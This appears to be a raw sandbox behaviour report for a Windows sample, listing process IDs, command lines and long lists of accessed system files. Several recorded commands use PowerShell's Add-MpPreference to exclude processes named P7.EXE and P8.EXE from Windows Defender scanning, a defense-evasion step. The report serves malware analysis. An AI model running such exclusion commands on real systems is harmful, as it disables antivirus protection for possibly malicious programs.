C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\MICROSOFT.POWERSHEL#\8CE205027E30804D1B2DEAFFA0582735\MICROSOFT.POWERSHELL.SECURITY.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\MICROSOFT.POWERSHELL.SECURITY\1.0.0.0__31BF3856AD364E35
C:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V2.0.50727\CULTURE.DLL
C:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V2.0.50727\MSCORRC.DLL
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM.XML\461D3B6B3F43E6FBE6C897D5936E17E4\SYSTEM.XML.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\SYSTEM.XML\2.0.0.0__B77A5C561934E089
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM.MANAGEMENT\6F3B99ED0B791FF4D8AA52F2F0CD0BCF\SYSTEM.MANAGEMENT.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\SYSTEM.MANAGEMENT\2.0.0.0__B03F5F7F11D50A3A
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM.DIRECTORYSER#\45EC12795950A7D54691591C615A9E3C\SYSTEM.DIRECTORYSERVICES.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\SYSTEM.DIRECTORYSERVICES\2.0.0.0__B03F5F7F11D50A3A
C:\WINDOWS\SYSWOW64\SHFOLDER.DLL
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\GETEVENT.TYPES.PS1XML
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\TYPES.PS1XML
C:\WINDOWS\SYSWOW64\TZRES.DLL
C:\WINDOWS\SYSWOW64\EN-US\TZRES.DLL.MUI
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\DIAGNOSTICS.FORMAT.PS1XML
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\WSMAN.FORMAT.PS1XML
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\CERTIFICATE.FORMAT.PS1XML
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\DOTNETTYPES.FORMAT.PS1XML
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\FILESYSTEM.FORMAT.PS1XML
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\HELP.FORMAT.PS1XML
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\POWERSHELLCORE.FORMAT.PS1XML
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\POWERSHELLTRACE.FORMAT.PS1XML
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\REGISTRY.FORMAT.PS1XML
C:\WINDOWS\SYSWOW64\SECUR32.DLL
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM.DATA\1E85062785E286CD9EAE9C26D2C61F73\SYSTEM.DATA.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_32\SYSTEM.DATA\2.0.0.0__B77A5C561934E089\SYSTEM.DATA.DLL
C:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V2.0.50727\MSCORJIT.DLL
C:\PROGRAM FILES (X86)\COMMON FILES\ORACLE\JAVA\JAVAPATH_TARGET_2162329
C:\WINDOWS\SYSWOW64\WBEM
C:\PROGRAM FILES\NODEJS
C:\USERS\ADMINISTRATOR\APPDATA\LOCAL\PROGRAMS\PYTHON\PYTHON37\SCRIPTS
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\NPM
C:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V2.0.50727\DIASYMREADER.DLL
C:\WINDOWS\SYSWOW64\NETUTILS.DLL
3324
Image path
CMD.EXE "/C POWERSHELL -COMMAND ADD-MPPREFERENCE -EXCLUSIONPROCESS 'P7.EXE'"
Time lapse
6.158186
Files Accessed
C:\WINDOWS\SYSTEM32\WOW64.DLL
C:\WINDOWS\SYSTEM32\WOW64WIN.DLL
C:\WINDOWS\SYSTEM32\WOW64CPU.DLL
C:\WINDOWS\SYSWOW64\WINBRAND.DLL
C:\WINDOWS\SYSWOW64\SECHOST.DLL
C:\WINDOWS\SYSWOW64\IMM32.DLL
C:\WINDOWS\SYSWOW64\EN-US\CMD.EXE.MUI
C:\PROGRAM FILES (X86)\COMMON FILES\ORACLE\JAVA\JAVAPATH_TARGET_2162329
C:\WINDOWS\SYSWOW64\WBEM
C:\WINDOWS\GLOBALIZATION\SORTING\SORTDEFAULT.NLS
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE
C:\WINDOWS\SYSWOW64\APPHELP.DLL
C:\WINDOWS\APPPATCH\SYSMAIN.SDB
Process children
3360
Image path
POWERSHELL -COMMAND ADD-MPPREFERENCE -EXCLUSIONPROCESS 'P7.EXE'"
Time lapse
6.329786
Files Accessed
C:\WINDOWS\SYSTEM32\WOW64.DLL
C:\WINDOWS\SYSTEM32\WOW64WIN.DLL
C:\WINDOWS\SYSTEM32\WOW64CPU.DLL
C:\WINDOWS\SYSWOW64\SECHOST.DLL
C:\WINDOWS\SYSWOW64\ATL.DLL
C:\WINDOWS\SYSWOW64\MSCOREE.DLL
C:\WINDOWS\SYSWOW64\IMM32.DLL
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\EN-US\POWERSHELL.EXE.MUI
C:\WINDOWS\SYSWOW64\UXTHEME.DLL
C:\WINDOWS\REGISTRATION\R000000000006.CLB
C:\WINDOWS\SYSWOW64\SHELL32.DLL
C:\WINDOWS\SYSWOW64\USERENV.DLL
C:\WINDOWS\SYSWOW64\PROFAPI.DLL
C:\WINDOWS\WINSXS\X86_MICROSOFT.WINDOWS.COMMON-CONTROLS_6595B64144CCF1DF_6.0.7601.17514_NONE_41E6975E2BD6F2B2\COMCTL32.DLL
C:\WINDOWS\WINDOWSSHELL.MANIFEST
C:\WINDOWS\GLOBALIZATION\SORTING\SORTDEFAULT.NLS
C:\WINDOWS\SYSWOW64\PROPSYS.DLL
C:\USERS\ADMINISTRATOR\APPDATA\LOCAL\MICROSOFT\WINDOWS\CACHES\CVERSIONS.1.DB
C:\WINDOWS\SYSWOW64\NTMARTA.DLL
C:\USERS\ADMINISTRATOR\APPDATA\LOCAL\MICROSOFT\WINDOWS\CACHES\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.VER0X0000000000000001.DB
C:\USERS\DESKTOP.INI
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\MICROSOFT\WINDOWS\START MENU\DESKTOP.INI
C:\USERS\ADMINISTRATOR\DESKTOP\DESKTOP.INI
C:\WINDOWS\SYSWOW64\EN-US\SHELL32.DLL.MUI
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\MICROSOFT\WINDOWS\START MENU\PROGRAMS\DESKTOP.INI
C:\PROGRAMDATA\MICROSOFT\WINDOWS\START MENU\DESKTOP.INI
C:\WINDOWS\SYSWOW64\EN-US\SETUPAPI.DLL.MUI
C:\PROGRAMDATA\MICROSOFT\WINDOWS\START MENU\PROGRAMS\DESKTOP.INI
C:\USERS\PUBLIC\DESKTOP.INI
C:\USERS\PUBLIC\DESKTOP\DESKTOP.INI
C:\WINDOWS\SYSWOW64\APPHELP.DLL
C:\WINDOWS\SYSWOW64\GAMEUX.DLL
C:\WINDOWS\WINSXS\X86_MICROSOFT.WINDOWS.GDIPLUS_6595B64144CCF1DF_1.1.7601.17514_NONE_72D18A4386696C80\GDIPLUS.DLL
C:\WINDOWS\SYSWOW64\XMLLITE.DLL
C:\WINDOWS\SYSWOW64\WER.DLL
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\MICROSOFT\INTERNET EXPLORER\QUICK LAUNCH\DESKTOP.INI
C:\WINDOWS\SYSWOW64\SHDOCVW.DLL
C:\WINDOWS\APPPATCH\SYSMAIN.SDB
C:\WINDOWS\SYSWOW64\EN-US\SHDOCVW.DLL.MUI
C:\WINDOWS\SYSWOW64\LINKINFO.DLL
C:\PROGRAMDATA\MICROSOFT\WINDOWS\START MENU\PROGRAMS\ACCESSORIES\DESKTOP.INI
C:\PROGRAMDATA\MICROSOFT\WINDOWS\START MENU\PROGRAMS\ACCESSORIES\WINDOWS POWERSHELL\DESKTOP.INI
C:\WINDOWS\SYSWOW64\NTSHRUI.DLL
C:\WINDOWS\SYSWOW64\SRVCLI.DLL
C:\WINDOWS\SYSWOW64\CSCAPI.DLL
C:\WINDOWS\SYSWOW64\SLC.DLL
C:\PROGRAMDATA\MICROSOFT\WINDOWS\START MENU\PROGRAMS\ACCESSORIES\WINDOWS POWERSHELL\WINDOWS POWERSHELL.LNK
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\POWERSHELL_ISE.EXE
C:\WINDOWS\HH.EXE
C:\WINDOWS\SYSWOW64\CRYPTSP.DLL
C:\WINDOWS\SYSWOW64\RSAENH.DLL
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\MICROSOFT\WINDOWS\RECENT\CUSTOMDESTINATIONS\TVJQ15YNJB5LU4FF3EIW.TEMP
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\MICROSOFT\WINDOWS\RECENT\CUSTOMDESTINATIONS\D93F411851D7C929.CUSTOMDESTINATIONS-MS~RFB643.TMP
C:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V4.0.30319\MSCOREEI.DLL
C:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V2.0.50727\MSCORWKS.DLL
C:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CLR.DLL
C:\WINDOWS\WINSXS\X86_MICROSOFT.VC80.CRT_1FC8B3B9A1E18E3B_8.0.50727.4940_NONE_D08CC06A442B34FC\MSVCR80.DLL
C:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V2.0.50727\CONFIG\MACHINE.CONFIG
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\INDEX149.DAT
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\MSCORLIB\62A0B3E4B40EC0E8C5CFAA0C8848E64A\MSCORLIB.NI.DLL
C:\WINDOWS\ASSEMBLY\PUBPOL25.DAT
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM\9E0A3B9B9F457233A335D7FBA8F95419\SYSTEM.NI.DLL
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\MICROSOFT.POWERSHEL#\B1C511D8FAD78AD3C5213B2B4FB02B8B\MICROSOFT.POWERSHELL.CONSOLEHOST.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\MICROSOFT.POWERSHELL.CONSOLEHOST\1.0.0.0__31BF3856AD364E35
C:\WINDOWS\ASSEMBLY\GAC_MSIL\SYSTEM.MANAGEMENT.AUTOMATION\1.0.0.0__31BF3856AD364E35\SYSTEM.MANAGEMENT.AUTOMATION.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\SYSTEM\2.0.0.0__B77A5C561934E089
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM.MANAGEMENT.A#\4436815B432C313255AF322F4EC3560D\SYSTEM.MANAGEMENT.AUTOMATION.NI.DLL
C:\WINDOWS\SYSWOW64\VERSION.DLL
C:\WINDOWS\SYSWOW64\L_INTL.NLS
C:\WINDOWS\SYSWOW64\EN-US\KERNELBASE.DLL.MUI
C:\WINDOWS\ASSEMBLY\GAC_32\MSCORLIB\2.0.0.0__B77A5C561934E089\SORTTBLS.NLP
C:\WINDOWS\ASSEMBLY\GAC_32\MSCORLIB\2.0.0.0__B77A5C561934E089\SORTKEY.NLP
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM.CORE\FBC05B5B05DC6366B02B8E2F77D080F1\SYSTEM.CORE.NI.DLL
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\MICROSOFT.POWERSHEL#\4F68CD04686E5DC5A55070D112D44BDF\MICROSOFT.POWERSHELL.COMMANDS.DIAGNOSTICS.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\MICROSOFT.POWERSHELL.COMMANDS.DIAGNOSTICS\1.0.0.0__31BF3856AD364E35
C:\WINDOWS\ASSEMBLY\GAC_MSIL\SYSTEM.CORE\3.5.0.0__B77A5C561934E089
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM.CONFIGURATIO#\F02737C83305687A68C088927A6C5A98\SYSTEM.CONFIGURATION.INSTALL.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\SYSTEM.CONFIGURATION.INSTALL\2.0.0.0__B03F5F7F11D50A3A
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\MICROSOFT.WSMAN.MAN#\EE28A075665B6BC23B6DAE56903D431D\MICROSOFT.WSMAN.MANAGEMENT.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\MICROSOFT.WSMAN.MANAGEMENT\1.0.0.0__31BF3856AD364E35
C:\WINDOWS\ASSEMBLY\GAC_MSIL\MICROSOFT.WSMAN.RUNTIME\1.0.0.0__31BF3856AD364E35\MICROSOFT.WSMAN.RUNTIME.DLL
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM.TRANSACTIONS\AD18F93FC713DB2C4B29B25116C13BD8\SYSTEM.TRANSACTIONS.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_32\SYSTEM.TRANSACTIONS\2.0.0.0__B77A5C561934E089\SYSTEM.TRANSACTIONS.DLL
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\MICROSOFT.POWERSHEL#\3008A05E2928E2C1D856CC34E0422C17\MICROSOFT.POWERSHELL.COMMANDS.UTILITY.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\MICROSOFT.POWERSHELL.COMMANDS.UTILITY\1.0.0.0__31BF3856AD364E35
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\MICROSOFT.POWERSHEL#\8DF695FB80187F65208D87229E81E8A2\MICROSOFT.POWERSHELL.COMMANDS.MANAGEMENT.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\MICROSOFT.POWERSHELL.COMMANDS.MANAGEMENT\1.0.0.0__31BF3856AD364E35
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\MICROSOFT.POWERSHEL#\8CE205027E30804D1B2DEAFFA0582735\MICROSOFT.POWERSHELL.SECURITY.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\MICROSOFT.POWERSHELL.SECURITY\1.0.0.0__31BF3856AD364E35
C:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V2.0.50727\CULTURE.DLL
C:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V2.0.50727\MSCORRC.DLL
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM.XML\461D3B6B3F43E6FBE6C897D5936E17E4\SYSTEM.XML.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\SYSTEM.XML\2.0.0.0__B77A5C561934E089
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM.MANAGEMENT\6F3B99ED0B791FF4D8AA52F2F0CD0BCF\SYSTEM.MANAGEMENT.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\SYSTEM.MANAGEMENT\2.0.0.0__B03F5F7F11D50A3A
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM.DIRECTORYSER#\45EC12795950A7D54691591C615A9E3C\SYSTEM.DIRECTORYSERVICES.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\SYSTEM.DIRECTORYSERVICES\2.0.0.0__B03F5F7F11D50A3A
C:\WINDOWS\SYSWOW64\SHFOLDER.DLL
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\GETEVENT.TYPES.PS1XML
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\TYPES.PS1XML
C:\WINDOWS\SYSWOW64\TZRES.DLL
C:\WINDOWS\SYSWOW64\EN-US\TZRES.DLL.MUI
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\DIAGNOSTICS.FORMAT.PS1XML
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\WSMAN.FORMAT.PS1XML
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\CERTIFICATE.FORMAT.PS1XML
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\DOTNETTYPES.FORMAT.PS1XML
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\FILESYSTEM.FORMAT.PS1XML
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\HELP.FORMAT.PS1XML
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\POWERSHELLCORE.FORMAT.PS1XML
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\POWERSHELLTRACE.FORMAT.PS1XML
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\REGISTRY.FORMAT.PS1XML
C:\WINDOWS\SYSWOW64\SECUR32.DLL
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM.DATA\1E85062785E286CD9EAE9C26D2C61F73\SYSTEM.DATA.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_32\SYSTEM.DATA\2.0.0.0__B77A5C561934E089\SYSTEM.DATA.DLL
C:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V2.0.50727\MSCORJIT.DLL
C:\PROGRAM FILES (X86)\COMMON FILES\ORACLE\JAVA\JAVAPATH_TARGET_2162329
C:\WINDOWS\SYSWOW64\WBEM
C:\PROGRAM FILES\NODEJS
C:\USERS\ADMINISTRATOR\APPDATA\LOCAL\PROGRAMS\PYTHON\PYTHON37\SCRIPTS
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\NPM
C:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V2.0.50727\DIASYMREADER.DLL
C:\WINDOWS\SYSWOW64\NETUTILS.DLL
C:\WINDOWS\SYSTEM32\IMM32.DLL
C:\WINDOWS\SYSTEM32\RPCSS.DLL
C:\WINDOWS\SYSTEM32\CRYPTBASE.DLL
C:\WINDOWS\SYSTEM32\UXTHEME.DLL
C:\WINDOWS\SYSTEM32\SECHOST.DLL
C:\WINDOWS\SYSTEM32\AUTHUI.DLL
C:\WINDOWS\SYSTEM32\CRYPTUI.DLL
C:\WINDOWS\WINSXS\AMD64_MICROSOFT.WINDOWS.COMMON-CONTROLS_6595B64144CCF1DF_6.0.7601.17514_NONE_FA396087175AC9AC\COMCTL32.DLL
C:\WINDOWS\WINSXS\AMD64_MICROSOFT.WINDOWS.GDIPLUS_6595B64144CCF1DF_1.1.7601.17514_NONE_2B24536C71ED437A\GDIPLUS.DLL
C:\WINDOWS\SYSTEM32\DUI70.DLL
C:\WINDOWS\SYSTEM32\DUSER.DLL
C:\WINDOWS\SYSTEM32\EN-US\AUTHUI.DLL.MUI
C:\WINDOWS\SYSTEM32\SNDVOLSSO.DLL
C:\WINDOWS\SYSTEM32\HID.DLL
C:\WINDOWS\SYSTEM32\MMDEVAPI.DLL
C:\WINDOWS\SYSTEM32\PROPSYS.DLL
C:\WINDOWS\SYSTEM32\EN-US\SETUPAPI.DLL.MUI
C:\WINDOWS\SYSTEM32\DWMAPI.DLL
C:\WINDOWS\SYSTEM32\XMLLITE.DLL
C:\WINDOWS\SYSTEM32\IMAGERES.DLL
C:\WINDOWS\SYSTEM32\WINDOWSCODECS.DLL
C:\WINDOWS\SYSTEM32\WINBRAND.DLL
C:\WINDOWS\BRANDING\BASEBRD\BASEBRD.DLL
C:\WINDOWS\BRANDING\BASEBRD\EN-US\BASEBRD.DLL.MUI
C:\WINDOWS\SYSTEM32\WTSAPI32.DLL
C:\WINDOWS\SYSTEM32\WINSTA.DLL
C:\WINDOWS\SYSTEM32\VAULTCREDPROVIDER.DLL
C:\WINDOWS\SYSTEM32\SMARTCARDCREDENTIALPROVIDER.DLL
C:\WINDOWS\SYSTEM32\RPCRTREMOTE.DLL
C:\WINDOWS\SYSTEM32\BIOCREDPROV.DLL
C:\WINDOWS\SYSTEM32\SECUR32.DLL
C:\WINDOWS\SYSTEM32\SSPICLI.DLL
C:\WINDOWS\SYSTEM32\WINBIO.DLL
C:\WINDOWS\SYSTEM32\CREDUI.DLL
C:\WINDOWS\SYSTEM32\VAULTCLI.DLL
C:\WINDOWS\SYSTEM32\NETAPI32.DLL
C:\WINDOWS\SYSTEM32\NETUTILS.DLL
C:\WINDOWS\SYSTEM32\SRVCLI.DLL
C:\WINDOWS\SYSTEM32\WKSCLI.DLL
C:\WINDOWS\SYSTEM32\SAMCLI.DLL
C:\WINDOWS\WIN.INI
C:\WINDOWS\SYSTEM32\CERTCREDPROVIDER.DLL
C:\WINDOWS\SYSTEM32\RASPLAP.DLL
C:\WINDOWS\SYSTEM32\RASAPI32.DLL
C:\WINDOWS\SYSTEM32\RASMAN.DLL
C:\WINDOWS\SYSTEM32\RTUTILS.DLL
C:\WINDOWS\SYSTEM32\CRYPTSP.DLL
C:\WINDOWS\SYSTEM32\RSAENH.DLL
C:\WINDOWS\SYSTEM32\INPUT.DLL
C:\WINDOWS\SYSTEM32\EN-US\INPUT.DLL.MUI
C:\PROGRAM FILES\COMMON FILES\MICROSOFT SHARED\INK\TIPTSF.DLL
C:\PROGRAM FILES\COMMON FILES\MICROSOFT SHARED\INK\EN-US\TIPTSF.DLL.MUI
C:\WINDOWS\IME\SPTIP.DLL
C:\WINDOWS\IME\EN-US\SPTIP.DLL.MUI
C:\PROGRAM FILES\WINDOWS NT\TABLETEXTSERVICE\TABLETEXTSERVICE.DLL
C:\PROGRAM FILES\WINDOWS NT\TABLETEXTSERVICE\EN-US\TABLETEXTSERVICE.DLL.MUI
C:\WINDOWS\SYSTEM32\EN-US\KERNELBASE.DLL.MUI
C:\WINDOWS\SYSTEM32\EN-US\MSCTF.DLL.MUI
C:\WINDOWS\SYSTEM32\OLEACC.DLL
C:\WINDOWS\SYSTEM32\OLEACCRC.DLL
C:\WINDOWS\SYSTEM32\UIAUTOMATIONCORE.DLL
C:\WINDOWS\SYSTEM32\SXS.DLL
C:\WINDOWS\FONTS\STATICCACHE.DAT
C:\WINDOWS\SYSTEM32\EN-US\IMAGERES.DLL.MUI
3368
Image path
CMD.EXE "/C POWERSHELL -COMMAND ADD-MPPREFERENCE -EXCLUSIONPROCESS 'P8.EXE'"
Time lapse
6.345386
Files Accessed
C:\WINDOWS\SYSTEM32\WOW64.DLL
C:\WINDOWS\SYSTEM32\WOW64WIN.DLL
C:\WINDOWS\SYSTEM32\WOW64CPU.DLL
C:\WINDOWS\SYSWOW64\WINBRAND.DLL
C:\WINDOWS\SYSWOW64\SECHOST.DLL
C:\WINDOWS\SYSWOW64\IMM32.DLL
C:\WINDOWS\SYSWOW64\EN-US\CMD.EXE.MUI
C:\PROGRAM FILES (X86)\COMMON FILES\ORACLE\JAVA\JAVAPATH_TARGET_2162329
C:\WINDOWS\SYSWOW64\WBEM
C:\WINDOWS\GLOBALIZATION\SORTING\SORTDEFAULT.NLS
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE
C:\WINDOWS\SYSWOW64\APPHELP.DLL
C:\WINDOWS\APPPATCH\SYSMAIN.SDB
Process children
3420
Image path
POWERSHELL -COMMAND ADD-MPPREFERENCE -EXCLUSIONPROCESS 'P8.EXE'"
Time lapse
6.485786
Files Accessed
C:\WINDOWS\SYSTEM32\WOW64.DLL
C:\WINDOWS\SYSTEM32\WOW64WIN.DLL
C:\WINDOWS\SYSTEM32\WOW64CPU.DLL
C:\WINDOWS\SYSWOW64\SECHOST.DLL
C:\WINDOWS\SYSWOW64\ATL.DLL
C:\WINDOWS\SYSWOW64\MSCOREE.DLL
C:\WINDOWS\SYSWOW64\IMM32.DLL
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\EN-US\POWERSHELL.EXE.MUI
C:\WINDOWS\SYSWOW64\UXTHEME.DLL
C:\WINDOWS\REGISTRATION\R000000000006.CLB
C:\WINDOWS\SYSWOW64\SHELL32.DLL
C:\WINDOWS\SYSWOW64\USERENV.DLL
C:\WINDOWS\SYSWOW64\PROFAPI.DLL
C:\WINDOWS\WINSXS\X86_MICROSOFT.WINDOWS.COMMON-CONTROLS_6595B64144CCF1DF_6.0.7601.17514_NONE_41E6975E2BD6F2B2\COMCTL32.DLL
C:\WINDOWS\WINDOWSSHELL.MANIFEST
C:\WINDOWS\GLOBALIZATION\SORTING\SORTDEFAULT.NLS
C:\WINDOWS\SYSWOW64\PROPSYS.DLL
C:\USERS\ADMINISTRATOR\APPDATA\LOCAL\MICROSOFT\WINDOWS\CACHES\CVERSIONS.1.DB
C:\WINDOWS\SYSWOW64\NTMARTA.DLL
C:\USERS\ADMINISTRATOR\APPDATA\LOCAL\MICROSOFT\WINDOWS\CACHES\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.VER0X0000000000000001.DB
C:\USERS\DESKTOP.INI
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\MICROSOFT\WINDOWS\START MENU\DESKTOP.INI
C:\USERS\ADMINISTRATOR\DESKTOP\DESKTOP.INI
C:\WINDOWS\SYSWOW64\EN-US\SHELL32.DLL.MUI
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\MICROSOFT\WINDOWS\START MENU\PROGRAMS\DESKTOP.INI
C:\PROGRAMDATA\MICROSOFT\WINDOWS\START MENU\DESKTOP.INI
C:\PROGRAMDATA\MICROSOFT\WINDOWS\START MENU\PROGRAMS\DESKTOP.INI
C:\USERS\PUBLIC\DESKTOP.INI
C:\USERS\PUBLIC\DESKTOP\DESKTOP.INI
C:\WINDOWS\SYSWOW64\APPHELP.DLL
C:\WINDOWS\SYSWOW64\GAMEUX.DLL
C:\WINDOWS\WINSXS\X86_MICROSOFT.WINDOWS.GDIPLUS_6595B64144CCF1DF_1.1.7601.17514_NONE_72D18A4386696C80\GDIPLUS.DLL
C:\WINDOWS\SYSWOW64\XMLLITE.DLL
C:\WINDOWS\SYSWOW64\WER.DLL
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\MICROSOFT\INTERNET EXPLORER\QUICK LAUNCH\DESKTOP.INI
C:\WINDOWS\SYSWOW64\SHDOCVW.DLL
C:\WINDOWS\APPPATCH\SYSMAIN.SDB
C:\WINDOWS\SYSWOW64\EN-US\SETUPAPI.DLL.MUI
C:\WINDOWS\SYSWOW64\EN-US\SHDOCVW.DLL.MUI
C:\WINDOWS\SYSWOW64\LINKINFO.DLL
C:\PROGRAMDATA\MICROSOFT\WINDOWS\START MENU\PROGRAMS\ACCESSORIES\DESKTOP.INI
C:\PROGRAMDATA\MICROSOFT\WINDOWS\START MENU\PROGRAMS\ACCESSORIES\WINDOWS POWERSHELL\DESKTOP.INI
C:\WINDOWS\SYSWOW64\NTSHRUI.DLL
C:\WINDOWS\SYSWOW64\SRVCLI.DLL
C:\WINDOWS\SYSWOW64\CSCAPI.DLL
C:\WINDOWS\SYSWOW64\SLC.DLL
C:\PROGRAMDATA\MICROSOFT\WINDOWS\START MENU\PROGRAMS\ACCESSORIES\WINDOWS POWERSHELL\WINDOWS POWERSHELL.LNK
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\POWERSHELL_ISE.EXE
C:\WINDOWS\HH.EXE
C:\WINDOWS\SYSWOW64\CRYPTSP.DLL
C:\WINDOWS\SYSWOW64\RSAENH.DLL
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\MICROSOFT\WINDOWS\RECENT\CUSTOMDESTINATIONS\KH0WBVPYPHJZ5WJ8Y4IX.TEMP
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\MICROSOFT\WINDOWS\RECENT\CUSTOMDESTINATIONS\D93F411851D7C929.CUSTOMDESTINATIONS-MS~RFBDD2.TMP
C:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V4.0.30319\MSCOREEI.DLL
C:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V2.0.50727\MSCORWKS.DLL
C:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CLR.DLL
C:\WINDOWS\WINSXS\X86_MICROSOFT.VC80.CRT_1FC8B3B9A1E18E3B_8.0.50727.4940_NONE_D08CC06A442B34FC\MSVCR80.DLL
C:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V2.0.50727\CONFIG\MACHINE.CONFIG
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\INDEX149.DAT
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\MSCORLIB\62A0B3E4B40EC0E8C5CFAA0C8848E64A\MSCORLIB.NI.DLL
C:\WINDOWS\ASSEMBLY\PUBPOL25.DAT
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM\9E0A3B9B9F457233A335D7FBA8F95419\SYSTEM.NI.DLL
